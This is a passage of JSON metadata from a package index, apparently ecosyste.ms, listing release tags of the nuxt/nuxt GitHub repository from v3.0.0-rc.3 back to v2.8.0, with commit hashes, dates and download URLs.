ag/v3.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3/manifests"},{"name":"@nuxt/ui-templates@0.1.1","sha":"2ea0ad23512a0ce341092dd08162503d94b8eef9","kind":"tag","published_at":"2022-05-07T18:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.1/manifests"},{"name":"v3.0.0-rc.2","sha":"a8d42d586f84b7cef66c7bf8b76eb560139e6f88","kind":"commit","published_at":"2022-05-02T20:47:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2/manifests"},{"name":"@nuxt/ui@0.1.1","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-05-02T09:31:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.1/manifests"},{"name":"v3.0.0-rc.1","sha":"0c2f07695702df33a63b88322d93d6815a227a0f","kind":"commit","published_at":"2022-04-20T21:09:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1/manifests"},{"name":"@nuxt/ui-templates@0.1.0","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-04-19T07:55:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.0/manifests"},{"name":"@nuxt/ui-assets@0.1.0","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-04-19T07:55:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-assets@0.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-assets@0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-assets%400.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.1.0/manifests"},{"name":"@nuxt/ui@0.1.0","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-04-19T07:55:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.0/manifests"},{"name":"v2.15.8","sha":"d4b9e4b0553bcd617ecbc0b8b76871070b347fcb","kind":"tag","published_at":"2021-08-11T21:10:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8/manifests"},{"name":"v2.15.7","sha":"4f370e2043b7731db0e8ef65a4f88431cd8795f3","kind":"tag","published_at":"2021-06-14T13:59:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7/manifests"},{"name":"v2.15.6","sha":"0eae970e74f1fbf29f400a3178f54061a79bfac2","kind":"tag","published_at":"2021-05-12T10:47:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6/manifests"},{"name":"v2.15.5","sha":"0460a278ab5258f0cd6d3fe8fc014f892b2bdaf6","kind":"tag","published_at":"2021-05-09T08:17:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5/manifests"},{"name":"v2.15.4","sha":"b39dcda6adf21e4eb82caef7895440755c6d96fc","kind":"tag","published_at":"2021-04-01T11:23:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4/manifests"},{"name":"v2.15.3","sha":"24a0c7e27123874f9545c46852b2e7d34920b017","kind":"tag","published_at":"2021-03-10T12:25:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3/manifests"},{"name":"v2.15.2","sha":"b7f9cdc2a44dbf25b1bd1845fdc8ebb65b0f0754","kind":"tag","published_at":"2021-02-23T09:20:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2/manifests"},{"name":"v2.15.1","sha":"95daddf43c3b9e9474870631727755ecd2e94319","kind":"tag","published_at":"2021-02-19T16:39:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1/manifests"},{"name":"v2.15.0","sha":"dcfb42b77221f559e7ccb09edd5c2a2004c5bc6b","kind":"tag","published_at":"2021-02-15T11:06:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0/manifests"},{"name":"v2.14.12","sha":"bde4c5f6b0e643716d97027cdd185891ada02f7f","kind":"tag","published_at":"2020-12-16T13:15:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12/manifests"},{"name":"v2.14.11","sha":"d85f4b92642f4668463deb286524d424e57a1f62","kind":"tag","published_at":"2020-12-09T23:21:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11/manifests"},{"name":"v2.14.10","sha":"e97051adfafb9517cabbfd9b87a02e8c37ce949e","kind":"tag","published_at":"2020-12-07T10:30:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10/manifests"},{"name":"v2.14.9","sha":"e9f380c9e6b729ab77b38babba6ad15e95b4efa8","kind":"tag","published_at":"2020-12-02T10:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9/manifests"},{"name":"v2.14.8","sha":"68d8fb84872b807b2149756bb97a84961854a2c3","kind":"tag","published_at":"2020-12-01T11:06:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8/manifests"},{"name":"v2.14.7","sha":"265d0e7aac3df9f83f323c4d2dba11434956fe9b","kind":"tag","published_at":"2020-10-15T16:29:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7/manifests"},{"name":"v2.14.6","sha":"41176577ad71a8b91a91ca8f458fd64a278dd88d","kind":"tag","published_at":"2020-09-21T10:46:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6/manifests"},{"name":"v2.14.5","sha":"3b037720f2edc3e351d200bbb8525df1e93d7aad","kind":"tag","published_at":"2020-09-10T12:36:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5/manifests"},{"name":"v2.14.4","sha":"1a77fba4eb247faa3f1c8ec0fa49ce372abeb1d8","kind":"tag","published_at":"2020-08-27T10:26:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4/manifests"},{"name":"v2.14.3","sha":"5e9d759d7bee6a3d32e16ef05eef988e882c600a","kind":"tag","published_at":"2020-08-16T17:04:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3/manifests"},{"name":"v2.14.2","sha":"34c56722c8c97c0c6a59ecfbc5836c38047e4572","kind":"tag","published_at":"2020-08-16T10:59:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2/manifests"},{"name":"v2.14.1","sha":"c30499d7e02cd6d8b51d97ee7d7a537d8a59f63b","kind":"tag","published_at":"2020-08-04T16:37:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1/manifests"},{"name":"v2.14.0","sha":"60f68638cb80ab461c5b02be34e8797677bd8dd1","kind":"tag","published_at":"2020-07-27T17:25:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0/manifests"},{"name":"v2.13.3","sha":"e3821ba78c23fafa753941a0c206bd23e39dd678","kind":"tag","published_at":"2020-07-02T18:08:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3/manifests"},{"name":"v2.13.2","sha":"c998072c94eef659d45819eaa2b18897b8923538","kind":"tag","published_at":"2020-06-26T19:03:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2/manifests"},{"name":"v2.13.1","sha":"56b158e7d689ba9f57e7aa83d672f5f32b18767b","kind":"tag","published_at":"2020-06-24T08:38:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1/manifests"},{"name":"v2.13.0","sha":"dbecbe4adae6a7ae172eb01a232d1804c7b996bc","kind":"tag","published_at":"2020-06-18T17:45:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0/manifests"},{"name":"v2.12.2","sha":"fb33bda6d114cde19b029ab71c810032ef51184f","kind":"tag","published_at":"2020-03-31T10:43:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2/manifests"},{"name":"v2.12.1","sha":"8d355956d49c71349d165c4ca7531107e20d7b27","kind":"tag","published_at":"2020-03-25T19:22:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1/manifests"},{"name":"v2.12.0","sha":"205a089f833f96298d9bd723aea15b93618ec05d","kind":"tag","published_at":"2020-03-17T16:45:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0/manifests"},{"name":"v2.11.0","sha":"7af9ec8c23d247b22f71866b7b5dcd100f08048d","kind":"tag","published_at":"2019-12-17T10:23:56.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0/manifests"},{"name":"v2.10.2","sha":"f6aa45dda605cae2ea51f7413c97190a7a02cb88","kind":"commit","published_at":"2019-10-21T21:16:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2/manifests"},{"name":"v2.10.1","sha":"624c4c058e47fd36c484efaf1494b762f585f633","kind":"tag","published_at":"2019-10-11T08:11:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1/manifests"},{"name":"v2.10.0","sha":"c17afa77a7c7490863c2040c8f448ba80082a891","kind":"tag","published_at":"2019-10-02T11:44:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0/manifests"},{"name":"v2.9.2","sha":"c8ee9a660809e856c28d8678c6a632bbdd6ed00f","kind":"tag","published_at":"2019-08-28T11:32:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"0157b971de97daecf2fadeafa5596ddaa30cdb28","kind":"tag","published_at":"2019-08-20T11:13:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"ce3b4569613866a69b96f0f89aa2bb7d9810f8c4","kind":"tag","published_at":"2019-08-20T08:24:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0/manifests"},{"name":"v2.8.1","sha":"2fabea9402864828fe9aafe8b0d13bcc674a1b3b","kind":"tag","published_at":"2019-06-04T20:28:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"82ec7b7dedfbc3a01b981a0ef72375814e023291","kind":"tag","published_at":"2019-05-30T17:09:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.